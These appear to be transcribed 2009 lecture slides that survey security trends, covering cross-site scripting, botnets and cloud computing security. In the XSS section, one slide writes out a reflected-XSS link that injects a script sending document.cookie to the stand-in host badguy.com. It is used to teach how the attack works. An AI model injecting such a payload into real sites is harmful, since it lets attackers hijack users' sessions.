trends and selected topics in security guo,yuanxiong 2009.11.27
TRANSCRIPT
Trends and Selected Topics in Security
Guo,Yuanxiong2009.11.27
Outline
• Overview of Security and Trends
• Three Selected Topics– Web Security– Botnet– Security in Cloud Computing
So Many Security Conferences and Experts but the reality is ………we are getting more and more unsecure!!!
Countries whose resources are used to host Malicious Programs in 2008 (From Kaspersky)
China was the absolute leader based on the number of attacks originating from resources located in the country!!!
Countries in which user are attacked in 2008(From Kaspersky)
It comes as no surprise that China is again in top place!!!
What is Security?
• Most of computer science is concerned with achieving desired behavior
• Security is concerned with preventing undesired behavior– Different way of thinking!– An enemy who is actively and maliciously tr
ying to circumvent any protective measures you put in place
Goals of Security
Prevention– Prevent attackers from violating security policy
Detection– Detect attackers’ violation of security policy
Recovery– Stop attack, assess and repair damage
Survivability– Continue to function correctly even if attack
succeeds
Components of Security
Confidentiality– Keeping data and resources hidden.
Integrity– Preventing unauthorized changes to data or
resources.
Availability– Enabling access to data and resources
Netwok Stacks
people
application
session
transport
network
data link
physical
IP
TCP
email, Web, NFS
RPC
802.11
Sendmail, FTP, NFS bugs, chosen-protocol and version-rollback attacks
SYN flooding, RIP attacks,sequence number prediction
IP smurfing and otheraddress spoofing attacks
RPC worms, portmapper exploits
WEP attacksRF
RF fingerprinting, DoS
Phishing attacks, usability
Research Methodology in the Society of Security• Mathematical Modeling: Machine Learning,
Date Mining, Game theory, Social Network Analysis, Graph Theory, Percolation Theory, Queuing Theory, ect…….
• System: Virtual Machine, Operating System, Complier, Programming Language, Software Engineering, Reverse Engineering, ect……
Topics in Security Research
• Important, Really Existent or Urgent to be Solved
• Three Selected Topics– Web Security– Botnet– Security in Cloud Computing
Web Security
Vulnerability Status: Web is ‘Winning’
Recent Website Security Statistics Report by WhiteHat Security Inc. (Nov. 12, 2009)
• 83% of websites have had at least one serious vulnerability
• 64% of websites currently have at least one serious vulnerability
• Web-based Attack is the mainstream
Web Application• Many sensitive tasks are done through web
– Online banking, online shopping– Database access– System administration
• Ease of detection and exploitation of web vulnerabilities
• Large number of low-grade software applications written by inexperienced developers
• Web applications and web users are targets of many attacks– Cross site scripting (XSS) (TOP 1 Threat)– SQL injection– Cross site request forgery– PHP Remote File Inclusion– Session hijacking– ect…..
Cross-Site Scripting Overview
16
Attack Server
Server Victim
User Victim
visit web site
receive malicious page
click on linkecho user input
1
2
3
send valuable data
5
4
17
The Setup
• User input is echoed into HTML response.
• Example: search field– http://victim.com/search.php ? term = apple
– search.php responds with:<HTML> <TITLE> Search Results </TITLE>
<BODY>
Results for <?php echo $_GET[term] ?> :
. . .
</BODY> </HTML>
• Is this exploitable?
18
Bad Input• Problem: no validation of input term
• Consider link: (properly URL encoded)http://victim.com/search.php ? term =
<script> window.open(“http://badguy.com?cookie = ”
+ document.cookie ) </script>
What if user clicks on this link?1. Browser goes to victim.com/search.php2. Victim.com returns
<HTML> Results for <script> … </script>3. Browser executes script:
Sends cookie for victim.com to badguy.com
19
So What?
• Why would user click on such a link?– Phishing email in webmail client (e.g. gmail).– Link in double-click banner ad … many many ways to fool user into clicking
• What if badguy.com gets cookie for victim.com ?
– Cookie can include session auth for victim.com
• Or other data intended only for victim.com
Violates same origin policy
20
Much Worse
• Attacker can execute arbitrary scripts in browser
• Can manipulate any DOM component on victim.com– Control links on page– Control form fields (e.g. password field) on this pag
e and linked pages.• Example: MySpace.com phishing attack injects
password field that sends password to bad guy.
Types of XSS vulnerabilities
• DOM-Based (local)– Problem exists within a page’s client-side script
• Non-persistent (“reflected”)– Data provided by a Web client is used by server-
side scripts to generate a page for that user
• Persistent (“stored”)– Data provided to an application is first stored
and later displayed to users in a Web page– Potentially more serious if the page is rendered
more than once
Botnet
• Bots: Autonomous programs performing tasks
• Botnets: group of bots
• Available for simultaneous control by bot masters
• A hybrid of many previous threats integrated with a command and control system.
• The root cause of a large number of security problems on the Internet.
Botnets
Botnet Statistics
• About 25% of all computers connected to the internet in the world are infected bots and controlled by attackers by estimation.
• Size: up to 1.4million nodes (a really bot army!!!)• 10 million bot computers were used to distribute
spam and malware across the Internet each day
• Honeypot: gather information– Run unpatched version of Windows– Usually infected within 10 minutes.
• Larger Damage: multiple computers grouped together to perform distributed attacks and bring down bigger targets.
• Hidden Attacker: attack packets are sent from the bot rather than directly from the attacker.
• Money!!!!!
Why Botnet is so attracting
Botnet Application
One Example of Botnet1. Attacker launches worm, virus, or o
ther mechanism to infect Windows machine.
2. Infected machines contact botnet controller via IRC.
3. Spammer (sponsor) pays Attacker for use of botnet.
4. Spammer uses botnet to send spam emails.
Current Botnet Research• Measuring the Botnet (Size, location, ect)
– Passive Analysis of Secondary effects caused by infected machine (Spam, DNS Query, ect).
– Infiltration: Join the botnet to perform analysis from the inside (Using Honeypot).
• Defending the Botnet– Cooperative Behaviors– Signatures– Attack Behaviors
Something New: Mobile Botnet (CCS 09’)
• The Attack Target: Home Location Register (HLR) - a massive database that stores the details of every SIM card an cellular network operator issues and would typically contain details on up to 5 million subscribers.
• Research result shows that a botnet of fewer than 12,000 infected cellphones could disrupt 93 per cent of traffic to a HLR of 1 million subscribers.
• World’s first iphone Virus Surfaces !!! (Nov. 2009)
Security Issues in Cloud Computing
A Frequent-asked Question:
• Is Cloud Computing just Reinventing of the wheel ?– Cluster Computing– Utility Computing– Software as a Service– Service Computing– ect……
• Still under debate, but the general consensus is that all those terms could be summarized by the umbrella of cloud computing
A Latest Working Definition (V15)
• ‘A pay-per-use model for enabling available, convenient and on-demand network access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications, services) that can be rapidly provisioned and released with minimal management effort or service provider interaction’ (From NIST)
• Promote availability and composed of five essential characteristics, three service models, and four deployment models.
Five Essential Characteristics
• On-demand self-service.
• Ubiquitous network access.
• Resource pooling
• Rapid elasticity
• Measured Service
Three Service Models
• Cloud Software as a Service– Use Provider’s applications over a network
• Cloud Platform as a Service– Deploy customer-created applications to a
Cloud
• Cloud Infrastructure as a Service– Rent processing, Storage, network capacity,
and other fundamental computing resources
Four Deployment Models
• Private cloud – Single enterprise owned
• Community cloud– Shared infrastructure for specific community
• Public cloud– Available to public and own by a
organization selling cloud services. • Hybrid cloud
– composition of two or more clouds
Benefits of Cloud Computing• Cost Savings
– Setting up and upgrade without huge expense for infrastructure purchase and maintenance, just pay-as-you-go.
• Immediacy– Provision and utilize a service in a single day,
compared to traditional IT projects– Agility of a business and reduction of the costs
with time delay• Availability
– The infrastructures of Cloud Provider are often powerful and have good load-balancing policy.
Benefits of Cloud Computing (Cont’)
• Scalability– On-demand provisioning and implementation,
allow for traffic peak. • Efficiency
– Shift maintenance activities to the cloud provider
– Focus efforts on innovation, research and development
• Resiliency– Back-up solution given by cloud providers in
disaster scenario
Security is the Major Issue
Research Topics
• Building Trust in the Cloud– Effects of different forms of breach reporting
on security– End-to-end data confidentiality in the cloud– Higher assurance clouds, Virtual Private Cloud,
ect. • Data Protection in Large-Scale Cross-Organization
Systems– Forensics and Evidence gathering mechanisms– Incident handling – monitoring and traceability– International differences in relevant regulations
including data protection and privacy
Research Topics (Cont’)
• Large Scale Computer Systems Engineering– Resource isolation mechanisms – data,
processing, memory, logs, ect– Interoperability between cloud providers– Resilience of cloud computing. How can cloud
improve resilience?
Current Findings
• It has been reported that on current cloud computing provider’s platform (Amazon EC2), Information Leakage can arise from sharing physical infrastructure between mutually distrustful users, even when their actions are isolated through machine virtualization as within a third-party cloud compute service.
• Many security problems need to be identified and solved before the age of Clouding computing to come !
Q&A